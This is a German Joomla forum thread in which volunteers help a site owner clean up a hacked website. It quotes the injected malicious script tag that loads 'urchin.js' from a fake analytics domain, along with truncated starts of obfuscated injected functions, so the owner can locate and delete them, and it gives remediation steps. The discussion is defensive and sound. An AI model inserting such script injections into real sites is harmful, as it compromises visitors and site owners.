Agoraso

Hallo FoxCore

Tönt alles super - bin aber trotzdem ein Greenhorn...

Was soll ich machen?
Kann ich den Code einfach löschen?
Ich hatte nie google-analytics installiert - wie ist das reingekommen?

Vielen Dank!
Ago

holmi

Der Code muss auf jeden Fall raus.

Schau dir mein Posting und und diesen Link an:
http://www.joomlaportal.de/sicherhei...tml#post665966


Du hast vermutlich eine alte Joomla Version oder eine Unsicher Komponente Installiert.
Darüber ist deine Seite gehackt worden.

Du musst jetzt mal versuchen in der Logdatei raus zu finden wann das Passiert ist und dann ein Backup einspielen das älter ist.
(Eventuell mal den Hoster fragen ob der eins hat)

Wie gesagt, deine Passwörter könnten jetzt bekannt sein und solange du die Lücke nicht schließt kann der Hacker jeder Zeit wieder eindringen.


EDIT
Sehe gerade das dein Joomla Version aktuell ist
Das Easybook 1.1 hat eine Lücke
http://www.easy-joomla.org/content/view/26/31/lang,de/

Welche Rechte hatten deine Dateien?
besonders die configuration.php und die index.php vom Template?


Björn

__________________
Problem gelöst? Dann markiere den Thread mit [GELÖST]

Agoraso

Scheisse: meine configuration.php war auf 777 - wie konnte mir das nur passieren?
Jetzt habe ich auf 644 gestellt, ist das ok?

Von wo bis wo genau?


Kann er das noch wenn ich EasyBook deinstallieren? deaktivieren?

holmi

Es gibt eine neue Version
alte Deinistallieren und neue Installieren.

Der Code muss raus:
<script src="http://analytics-google.info/urchin.js"></script>

Das sind lange Zeilen ich schreibe mal nur den Anfang
Hinter <body class="page_bg">:
<!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857

Letzte Zeile hinter: </html>
<script>check_content()</script><!-- 1213806179 --><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a)


Das Löst aber dein Problem nicht
Wenn ich mir die Beschreibung vom Easybook Problem anschaue vermute ich das das nicht deine betroffene Lücke war.
Ich habe da aber keine Ahung von


Du musst unbedingt deine Passwörter ändern und in der Logdatei rausfinden wie und wann der Code in dein Template gekommen ist.
Der Hacker kann überall auf deinem Webspace weitere Programme versteckt haben mit denen er Zugang zum Server hat.
Da bringt es nichts nur die 3 Zeilen im Template zu löschen.

So leid es mit tut, ein gehackter Server macht elendig viel Arbeit.


Björn

__________________
Problem gelöst? Dann markiere den Thread mit [GELÖST]

Agoraso

Vielen Dank.
Kann heute wohl nicht schlafen.

configuration.php auf 644 ok?

Ich habe mein Passwort geändert. Warum schreibst du in der Mehrzahl - in der Regel hat man ein Passwort oder?

holmi

Wenn du ein Passwort für Joomla, FTP, MySQL verwendest müssen die alle geändert werden.
Steht oben beim Link in der Liste von Flotte ;-)

Björn

__________________
Problem gelöst? Dann markiere den Thread mit [GELÖST]

Agoraso

Besten Dank bis hierhin!

In welcher Datei finde ich denn:
<body class="page_bg"><!-- ad --><script>function c1131313m4857aa739c121(m4857aa... ?
das ist weder in der configuration noch in der index vom tempalte.

holmi

Du hast den Code immer noch drin.
Wenn du es nicht findest solltest du schnellstens den Punkt 1 und 2 der Liste umsetzen,
Den link habe ich dir ja schon 2 mal gegeben:
Eine Gehackte Seite ist eine echte Gefahr, nimm das nicht auf die leichte Schulter.


Ich hätte es in der templates/dd_apricot/index.php vermutet.
Einmal hast du das <script src="http://analytics-google.info/urchin.js"></script> ja schon gelöscht, wo war das denn drin?

Hier mal der bereich wo es steht:
Und ganz am ende der index.php ist noch mehr.


Wenn es im Template nicht drin ist, ist es irgendwo im Joomla eingeschleust, darum muss da schnellstens ein Sauberes Backup eingespielt werden.


Björn

__________________
Problem gelöst? Dann markiere den Thread mit [GELÖST]

Agoraso

hab die datei endlich gefunden

das mach ich jetzt dennnoch, oder?

Jetzt muss ich sogar wieder etwas schmunzeln - obschon mir immer noch gar nicht danach ist: ich hab schon 24h nicht mehr geschlafen. bin ein greenhorn. mein täglichbrot hängt von dieser seite ab. da kann man NICHTS auf die leichte schulter nehmen.

ich habs wahrscheinlich aus versehen gelöscht oder das zeug ist amöbenhaft...!

in welcher index.php? template oder root?

Ja, das will ich machen. Und was, wenn der Kranke nach dem Hack ein Backup gemacht hat? Dann bin ich tot; oder?


Vielen Dank bis hier hin. Falls du mal auf Kreta bist hast du 3 Gratisnächte! Und gratis wireless Access.
Willkommen!
Ago

FoxCore

Bei mir waren der Code in der index.php im Root-Verzeichnis der Joomla-Installation. Bei mir wurde der code <script>http://analytics-google(....)</script> zuoberst in die index.php geschrieben.
Zu unterst wurde dieser kryptische Quelltext mit den vielen Buchstaben und zahlen eingefügt. Dieser kannst du auch entfernen, also alles was hinter steht, beginnend mit <!-- ad --><script>function c1131 (....) und endend mit <script>check_content()</script> kannst du entfernen.

Vorher solltest du davon aber umbedingt eine Sicherheitskopie machen, damit du bei einem Fehler die alte "infizierte" Version wiederherstellen kannst, und du es noch einmal versuchen kannst.

Was sehr, sehr wichtig ist, ist dass du das Passwort für den FTP-Account änderst, da ansonsten der Hacker sich einfach wieder einloggen kann, und den Code wieder einfügen kann.

Ich mache es ab jetzt auch so, dass ich für jede Joomla-Seite einen eigenen FTP-Account habe, damit bei einem Angriff "nur" die Seite und nicht der gesamte webspace betroffen ist. Diesmal hatte ich zwei Seiten, auf dem Webspace die beide davon betroffen waren.

Was mich jetzt aber selber interessieren würde, ist wie der Hacker denn hineingekommen ist. Was natürlich ein grosses Einfalltor war, ist die configuration.php, aber ich kann nicht ausschliessen, dass es eine Sicherheitslücke einer Komponente oder von Joomla war.